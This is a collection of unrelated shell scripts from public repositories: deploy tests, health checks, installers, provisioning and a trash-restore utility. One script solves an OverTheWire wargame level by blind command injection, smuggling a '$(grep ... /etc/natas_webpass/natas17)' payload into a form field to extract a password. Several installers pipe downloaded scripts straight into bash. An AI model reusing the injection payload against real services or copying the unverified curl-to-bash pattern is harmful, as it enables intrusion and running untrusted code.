echo ===== master - skip deploy - angular fork
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=notangular
export CI_REPO_NAME=angular
$deployToFirebaseDryRun
)
expected="Skipping deploy because this is not angular/angular."
check "$actual" "$expected"
)
(
echo ===== master - skip deploy - pull request
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=true
$deployToFirebaseDryRun
)
expected="Skipping deploy because this is a PR build."
check "$actual" "$expected"
)
(
echo ===== master - deploy success
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=master
export CI_COMMIT=$(git ls-remote origin master | cut -c1-40)
export CI_SECRET_AIO_DEPLOY_FIREBASE_TOKEN=XXXXX
$deployToFirebaseDryRun
)
expected="Git branch : master
Build/deploy mode : next
Firebase project : angular-hispano-staging
Firebase site : angular-hispano-docs-staging
Deployment URL : https://angular-hispano-docs-staging.web.app/"
check "$actual" "$expected"
)
(
echo ===== master - skip deploy - commit not HEAD
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=master
export CI_COMMIT=DUMMY_TEST_COMMIT
$deployToFirebaseDryRun
)
expected="Skipping deploy because DUMMY_TEST_COMMIT is not the latest commit ($(git ls-remote origin master | cut -c1-40))."
check "$actual" "$expected"
)
(
echo ===== stable - deploy success
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=4.3.x
export CI_STABLE_BRANCH=4.3.x
export CI_COMMIT=$(git ls-remote origin 4.3.x | cut -c1-40)
export CI_SECRET_AIO_DEPLOY_FIREBASE_TOKEN=XXXXX
$deployToFirebaseDryRun
)
expected="Git branch : 4.3.x
Build/deploy mode : stable
Firebase project : angular-latino
Firebase site : angular-hispano-docs-prod
Deployment URL : https://docs.angular.lat/"
check "$actual" "$expected"
)
(
echo ===== stable - skip deploy - commit not HEAD
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=4.3.x
export CI_STABLE_BRANCH=4.3.x
export CI_COMMIT=DUMMY_TEST_COMMIT
$deployToFirebaseDryRun
)
expected="Skipping deploy because DUMMY_TEST_COMMIT is not the latest commit ($(git ls-remote origin 4.3.x | cut -c1-40))."
check "$actual" "$expected"
)
| true
|
b730eab588b68e3859503975402ddd90ae1b1eb2
|
Shell
|
SNL-GMS/GMS-PI7-OPEN
|
/docker-tree/centos7/openjdk9/nifi/scripts/nifi_health_check.sh
|
UTF-8
| 1,263
| 4.0625
| 4
|
[
"LicenseRef-scancode-free-unknown",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
set -x
#
# Description: Validates all clustered NiFi nodes are connected then exit
#
# HTTP or HTTPS
NIFI_PROTOCOL=$1
# Hostname of NiFi node
NIFI_HOST=$2
# Nifi WebUI Port
NIFI_PORT=$3
# Validate parameteres are passed in
if [ -z ${NIFI_PROTOCOL} ] || [ -z ${NIFI_HOST} ] || [ -z ${NIFI_PORT} ]; then
echo "Usage ./nifi_health_check.sh [NIFI_PROTOCOL] [NIFI_HOST] [NIFI_PORT]"
exit 1
fi
# Get the InitialHTTP Response from NiFi
response=$(curl -k --write-out %{http_code} --silent --output /dev/null "${NIFI_PROTOCOL}://${NIFI_HOST}:${NIFI_PORT}")
# Wait for NiFi UI to be reachable
if [ $response -ne 200 ]; then
exit 1
fi
# Get the initial NiFi Cluster API return
resp_type=$(curl -sk -X GET "${NIFI_PROTOCOL}://${NIFI_HOST}:${NIFI_PORT}/nifi-api/controller/cluster" | jq type 2> /dev/null)
ret_code=$?
# Wait for NiFI Cluster API to return JSON
if [ $ret_code -ne 0 ]; then
exit 1
fi
# Check for Unconnected Nodes
unconnected_node_count=$(curl -sk -X GET "${NIFI_PROTOCOL}://${NIFI_HOST}:${NIFI_PORT}/nifi-api/controller/cluster" | jq ".cluster.nodes[].status" | grep -v 'CONNECTED' | wc -l | tr -d ' ')
# Wait for all nodes to be connected
if [ $unconnected_node_count -ne 0 ]; then
exit 1
fi
# Finished
exit 0
| true
|
11a99a46de360b5a409dc61f12c6cc442a9fb621
|
Shell
|
lenik/stack
|
/plover/repr/plover-restful/j
|
UTF-8
| 61
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
a=1
if true; then
a=3
fi > >( a=4 )
echo $a
| true
|
2b6a3e7581bb50bb4daa13908ea11a2a9939146e
|
Shell
|
chowie/dotfiles
|
/bin/mtapp2
|
UTF-8
| 914
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
APP=$1
DATE=`date +%Y-%m-%d`
LOGFILE="${APP}-${DATE}.log"
REMOTE_DIR=/usr/local2/applogs/laravel
LOCAL_DIR=/var/www/${APP}/storage/logs
LOGLEVELS_TOP='ERROR'
LOGLEVELS_BOTTOM='INFO|DEBUG|LOGIN|NOTICE|WARNING'
if [ "$2" == "local" ]
then
FULL_LOGFILE="${LOCAL_DIR}/${LOGFILE}"
else
FULL_LOGFILE="${REMOTE_DIR}/${LOGFILE}"
fi
#multitail \
#-cS php -e 'ERROR' -l "tail -f -n 30 ${FULL_LOGFILE}" \
#-cS php -e 'DEBUG|LOGIN|NOTICE|WARNING' -l "tail -f -n 30 ${FULL_LOGFILE}"
if [ "$2" == "local" ]
then
multitail \
-cS php -e ${LOGLEVELS_TOP} -l "tail -f -n 30 ${FULL_LOGFILE}" \
-cS php -e ${LOGLEVELS_BOTTOM} -l "tail -f -n 30 ${FULL_LOGFILE}"
else
multitail \
-cS php -e ${LOGLEVELS_TOP} -l "ssh boedevphplx 'tail -f -n 30 ${FULL_LOGFILE}'" \
-cS php -e ${LOGLEVELS_BOTTOM} -l "ssh boedevphplx 'tail -f -n 30 ${FULL_LOGFILE}'"
fi
| true
|
a1806fe887258be83d94946cc8050411cb03ca13
|
Shell
|
YasinEnigma/Scripts
|
/install-dart.sh
|
UTF-8
| 730
| 2.671875
| 3
|
[] |
no_license
|
# Update package repo listings
sudo apt-get update
# Enable access to repos using the HTTPS protocol
sudo apt-get install apt-transport-https
# Add Google linux sign in key to allow Dart repo registry
sudo sh -c 'curl https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -'
# Register Dart repo (release version)
sudo sh -c 'curl https://storage.googleapis.com/download.dartlang.org/linux/debian/dart_stable.list > /etc/apt/sources.list.d/dart_stable.list'
# or Register Dart repo (dev version)
# sudo sh -c 'curl https://storage.googleapis.com/download.dartlang.org/linux/debian/dart_unstable.list > /etc/apt/sources.list.d/dart_unstable.list'
# Install Dart SDK
sudo apt-get update
sudo apt-get install dart
| true
|
3b3c8c8502e5bb16ec392f6043d5b1bf9d17b838
|
Shell
|
MEHColeman/empty_rails_project
|
/bin/create
|
UTF-8
| 1,779
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Exit if any subcommand fails
set -e
# Set up Ruby dependencies and Rails
bundle update
bundle exec rails new --force .
# Create new, blank README template
mv README.md.template README.md
# append extra onto the rails-generated gitignore
cat gitignore.dotfile >> .gitignore
cat Gemfile.append >> Gemfile
# Create RSpec framework
bundle exec rails generate rspec:install
cat << EOF > /tmp/newfile.rb
begin
require 'simplecov'
SimpleCov.start
rescue LoadError
# simplecov not installed. That's OK.
end
EOF
cat spec/spec_helper.rb >> /tmp/newfile.rb
mv /tmp/newfile.rb spec/spec_helper.rb
# Create Guard install
bundle exec guard init
bundle exec guard init rspec
# Append rails-only bullet config
cat << EOF > config/environments/development.rb
config.after_initialize do
Bullet.enable = true
Bullet.sentry = true
Bullet.alert = true
Bullet.bullet_logger = true
Bullet.console = true
Bullet.growl = true
Bullet.xmpp = { :account => 'bullets_account@jabber.org',
:password => 'bullets_password_for_jabber',
:receiver => 'your_account@jabber.org',
:show_online_status => true }
Bullet.rails_logger = true
Bullet.honeybadger = true
Bullet.bugsnag = true
Bullet.airbrake = true
Bullet.rollbar = true
Bullet.add_footer = true
Bullet.skip_html_injection = false
Bullet.stacktrace_includes = [ 'your_gem', 'your_middleware' ]
Bullet.stacktrace_excludes = [ 'their_gem', 'their_middleware', ['my_file.rb', 'my_method'], ['my_file.rb', 16..20] ]
Bullet.slack = { webhook_url: 'http://some.slack.url', channel: '#default', username: 'notifier' }
end
EOF
# Tidy up generated code
rubocop --auto-correct . || true
# Replace this project's git with a new, clean repo
rm -rf ./.git
git init
git add .
git commit -m 'Initial commit'
| true
|
a5baf78cbbc047a3dfb0c8c216d0ce128bddbe1f
|
Shell
|
adeben1/killifish-aging-brain
|
/RNA_diferenciales/STAR_mapear_lecturas_RNAseq.sh
|
UTF-8
| 1,186
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
# Instructions:
# 1. Create a folder run/ containing folders whose names are descriptive of each sample.
# 2. Each sub-folder must contain one/two (single/paired end) fq.gz.
# 3. Resulting files will appear in each of these sub-folders.
#SBATCH -J STAR
#SBATCH -N 1
threads=6
#SBATCH -n $threads
## Change manually
indexDirectory=/home/areyes/notFur
gtf_path=/home/ska/jtena/genomes/Nfu_20150522.genes_20140630.gtf
## Don't change (except cores)
SCRATCH=/scratch/areyes_$SLURM_JOB_ID
mkdir -p $SCRATCH || exit $?
mkdir $SCRATCH/starIndex
mkdir $SCRATCH/results
wd=$PWD
folder=$1
namePrefix=${folder##*/}
cp $indexDirectory/* $SCRATCH/starIndex/
file1=$folder/*.fq.gz
#file2=$folder/*_2.fq.gz
cp $file1 $SCRATCH/1.fq.gz
#cp $file2 $SCRATCH/2.fq.gz
cp $gtf_path $SCRATCH/model.gtf
cd $SCRATCH
gunzip *.fq.gz
#Add if this option if no strand specific and wanna use cufflinks
#--outSAMstrandField intronMotif
STAR --genomeDir ./starIndex --outSAMtype BAM SortedByCoordinate --sjdbGTFfile model.gtf --runThreadN 10 --readFilesIn 1.fq 2.fq --outFileNamePrefix results/$namePrefix --quantMode GeneCounts
dest=${wd}/${folder}
mv results/* $folder
rm -rf $SCRATCH
| true
|
e7128a8916e1ff6c874bbd993b2fcf3ed242ca5d
|
Shell
|
hvolschenk/git-gt
|
/lib/de/gt-de.sh
|
UTF-8
| 296
| 3.359375
| 3
|
[
"Apache-2.0"
] |
permissive
|
deleteString='-d'
if [ -z ${variables[0]} ]; then
echo 'Please select a branch to delete: gt de <...branch>'
exit 1;
fi
if [ $flagForceDelete = true ]; then
deleteString='-D'
fi
for deleteBranch in ${variables[@]}; do
git branch $deleteString $deleteBranch
done
unset -v deleteString
| true
|
0a936e78062868f96e94eee119be7e0f423817ef
|
Shell
|
squareweave/dockerized-drupal-composer
|
/8.4/fpm/node/app/scripts/at-boot.sh
|
UTF-8
| 1,092
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash -e
if [ -n $MEMORY_LIMIT ]
then
echo "Setting PHP memory limit to ${MEMORY_LIMIT}"
echo "memory_limit = ${MEMORY_LIMIT}" > /usr/local/etc/php/conf.d/resources.ini
fi
: ${DEVELOPMENT_MODE:-false}
if [ "$DEVELOPMENT_MODE" == "true" ]
then
echo "!!! RUNNING IN DEVELOPMENT MODE -- PERMISSIONS WILL NOT BE HARDENED !!!"
chown -R www-data:www-data /app/web/sites/default/files /app/config/sync
chmod -R =rw,+X /app/web/sites/default/files /app/config/sync
/app/scripts/at-deploy.sh
/app/scripts/after-deploy.sh
else
chown -R www-data:www-data /app/web
chmod -R =r,+X /app/web
chmod -R =rw,+X /app/web/sites/default/files
fi
if [ -n $NR_INSTALL_KEY ]
then
/usr/bin/newrelic-install install
sed -i "s/newrelic.appname = \"PHP Application\"/newrelic.appname = \"${NR_APP_NAME}\"/" \
/usr/local/etc/php/conf.d/newrelic.ini
fi
# Wait for the DB to settle
dockerize -wait tcp://${DB_HOST:-db}:${DB_PORT:-3306} -timeout 60s -template /etc/ssmtp/ssmtp.conf.tmpl:/etc/ssmtp/ssmtp.conf
# Stop. Apache time.
exec "apache2-foreground"
| true
|
1fdaa0296621d8c79e7021c00664e4d29caf7623
|
Shell
|
parayiv/noStarch
|
/16_unrm.sh
|
UTF-8
| 2,442
| 4.46875
| 4
|
[] |
no_license
|
#!/bin/sh
# unrm - Searches the deleted files archive for the specified file or directory.
# If there is more than one matching result, shows a list of the results,
# ordered by timestamp, and lets the user specify which one to restore.
mydir="$HOME/.deleted-files"
realrm="/bin/rm.old"
move="/bin/mv"
dest=$(pwd)
if [ ! -d $mydir ]; then
echo "$0: No deleted files directory: nothing to unremove." >&2; exit 1
fi
cd $mydir
if [ $# -eq 0 ] ; then # No args specified, just show listing
echo "Contents of your deleted files archive (sorted by date): "
ls -FC | sed -e 's/\([[:digit:]][[:digit:]]\.\)\{5\}//g' -e 's/^/ /'
exit 0
fi
# Otherwise we must have a user-specified pattern to work with.Let's see if the
# pattern matches more than one file or directory in the archive
matches="$(ls "$1"* 2> /dev/null | wc -l )"
if [ $matches -eq 0 ]; then
echo "No match for \"$1\" in the deleted file archive." >&2
exit 1
fi
if [ $matches -ge 1 ]; then
echo "More than one file or directory match in the archive: "
index=1
for name in $(ls -td "$1"*); do
datetime="$(echo $name | cut -c1-14 | \
awk -F. '{ print $5"/"$4" at "$3":"$2":"$1 }')"
if [ -d $name ]; then
size="$(ls $name | wc -l | sed 's/[^[:digit:]]//g')"
echo " $index) $1 (contents = ${size} items, deleted = $datetime)"
else
size="$(ls -sdk1 $name | awk '{print $1}')"
echo " $index) $1 (size = ${size}Kb, deleted = $datetime)"
fi
index=$(( $index + 1))
done
echo
echo -n "Which version of $1 do you want to restore ('0' to quit)? [1] : "
read desired
if [ ${desired:=1} -ge $index ] ; then
echo "$0: Restore canceled by user: index value too big." >&2
exit 1
fi
if [ $desired -lt 1 ] ; then
echo "$0: restore canceled by user." >&2 ; exit 1
fi
restore="$(ls -td1 "$1"* | sed -n "${desired}p")"
if [ -e "$dest/$1" ] ; then
echo "\"$1\" already exists in this directory. Cannot overwrite." >&2
exit 1
fi
echo -n "Restoring file \"$1\" ..."
$move "$restore" "$dest/$1"
echo "done."
echo -n "Delete the additional copies of this file? [y] "
read answer
if [ ${answer:=y} = "y" ] ; then
$realrm -rf *"$1"
echo "deleted."
else
echo "additional copies retained."
fi
else
if [ -e "$dest/$1" ] ; then
echo "\"$1\" already exists in this directory. Cannot overwrite." >&2
exit 1
fi
restore="$(ls -d *"$1")"
echo -n "Restoring file \"$1\" ... "
$move "$restore" "$dest/$1"
echo "done."
fi
exit 0
| true
|
972661d9d8c3bc117ef8824f843218f1eeb0b565
|
Shell
|
BloodyMods/ServerStarter
|
/src/main/resources/startserver.sh
|
UTF-8
| 1,775
| 3.890625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# `-d64` option was removed in Java 10, this handles these versions accordingly
JAVA_FLAGS=""
if (( $(java -version 2>&1 | head -1 | cut -d'"' -f2 | sed '/^1\./s///' | cut -d'.' -f1) < 10 )); then
JAVA_FLAGS="-d64"
fi
DO_RAMDISK=0
if [[ $(cat server-setup-config.yaml | grep 'ramDisk:' | awk 'BEGIN {FS=":"}{print $2}') =~ "yes" ]]; then
SAVE_DIR=$(cat server.properties | grep 'level-name' | awk 'BEGIN {FS="="}{print $2}')
mv $SAVE_DIR "${SAVE_DIR}_backup"
mkdir $SAVE_DIR
sudo mount -t tmpfs -o size=2G tmpfs $SAVE_DIR
DO_RAMDISK=1
fi
if [ -f serverstarter-@@serverstarter-libVersion@@.jar ]; then
echo "Skipping download. Using existing serverstarter-@@serverstarter-libVersion@@.jar"
java $JAVA_FLAGS -jar serverstarter-@@serverstarter-libVersion@@.jar
if [[ $DO_RAMDISK -eq 1 ]]; then
sudo umount $SAVE_DIR
rm -rf $SAVE_DIR
mv "${SAVE_DIR}_backup" $SAVE_DIR
fi
exit 0
else
export URL="https://github.com/BloodyMods/ServerStarter/releases/download/v@@serverstarter-libVersion@@/serverstarter-@@serverstarter-libVersion@@.jar"
fi
echo $URL
which wget >> /dev/null
if [ $? -eq 0 ]; then
echo "DEBUG: (wget) Downloading ${URL}"
wget -O serverstarter-@@serverstarter-libVersion@@.jar "${URL}"
else
which curl >> /dev/null
if [ $? -eq 0 ]; then
echo "DEBUG: (curl) Downloading ${URL}"
curl -o serverstarter-@@serverstarter-libVersion@@.jar -L "${URL}"
else
echo "Neither wget or curl were found on your system. Please install one and try again"
fi
fi
java $JAVA_FLAGS -jar serverstarter-@@serverstarter-libVersion@@.jar
if [[ $DO_RAMDISK -eq 1 ]]; then
sudo umount $SAVE_DIR
rm -rf $SAVE_DIR
mv "${SAVE_DIR}_backup" $SAVE_DIR
fi
| true
|
24afe12d7c1eb65bf03ff8737cb843b102152fac
|
Shell
|
DiegoBMarin/agendapp-front
|
/aggendAppScript.sh
|
UTF-8
| 369
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "settings server"
echo "Purging Nodejs"
sudo apt purge nodejs -y
sudo apt autoremove -y
echo "install curl"
sudo apt-get install curl -y
echo "install Node JS"
curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
sudo apt-get install nodejs -y
echo "install pm2"
sudo npm install pm2 -g
echo "install nginx"
sudo apt install nginx -y
| true
|
3a2491bb0d51dafff09131972bdc24345ba4c317
|
Shell
|
easaemad14/otw_wargames
|
/natas/natas16.sh
|
UTF-8
| 767
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
PASSWORD=""
TMP_FILE="temp.log"
TEST_STR="hackers"
OPTS="-s -u natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
DATA='needle='
PASS_FILE='/etc/natas_webpass/natas17'
URL="natas16.natas.labs.overthewire.org"
# We can probably assume the password is 32 bytes long
# This is the length of the rest of our passwords
for i in {1..32}
do
for c in {{a..z},{A..Z},{0..9}}
do
# Append the output of our injected command to our test string
curl $OPTS --data-urlencode "$DATA$TEST_STR\$(grep ^$PASSWORD$c $PASS_FILE)" $URL > $TMP_FILE
# If our test string exists in the dictionary, it was not a match
if grep -q $TEST_STR $TMP_FILE
then
continue
else
PASSWORD=$PASSWORD$c
break
fi
done
done
rm $TMP_FILE
echo "Password: $PASSWORD"
exit 0
| true
|
ffd06c624999c61a6fc1d36d5d63194d47c75767
|
Shell
|
kordless/stackmonkey
|
/openstack_provision.sh
|
UTF-8
| 1,555
| 3.3125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# disable that stupid locale error
sed '/SendEnv LANG LC_*/d' /etc/ssh/ssh_config > /tmp/ssh_config.tmp
cp /tmp/ssh_config.tmp /etc/ssh/ssh_config
# install git and curl
apt-get -y install git;
apt-get -y install curl;
# checkout scripts again to the chef server and copy config file over
git clone https://github.com/kordless/stackmonkey.git /root/bluechipstack/;
cp /vagrant/setuprc /root/bluechipstack/;
# install chef server
cat /root/bluechipstack/openstack_chef_server.sh | bash;
# generate a key for pushing to nodes
ssh-keygen -N "" -f /root/.ssh/id_rsa
# add path for knife
echo "export PATH=$PATH:/opt/chef-server/bin/" >> /root/.bashrc
# patch up the /etc/hosts file that chef chews all over
sed '1,2d' /etc/hosts > /tmp/hosts
echo '10.0.2.15 chef-server precise64' >> /tmp/hosts
echo '127.0.0.1 localhost' >> /tmp/hosts
cp /tmp/hosts /etc/hosts
# now install rackspace cookbooks (requires changes to /etc/hosts above)
curl -s -L https://raw.github.com/rcbops/support-tools/master/chef-install/install-cookbooks.sh | bash;
# shout out to the user
echo "=========================================================="
echo "Vagrant Chef server provisioning is complete."
echo;
echo "Type the following to continue:"
echo "1. 'vagrant ssh' to connect to the Chef server."
echo "2. 'sudo su' to become root on the Chef server."
echo "3. 'cd /root/bluechipstack/' to change directories."
echo "4. './openstack_install.sh' to resume install."
echo "=========================================================="
echo;
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.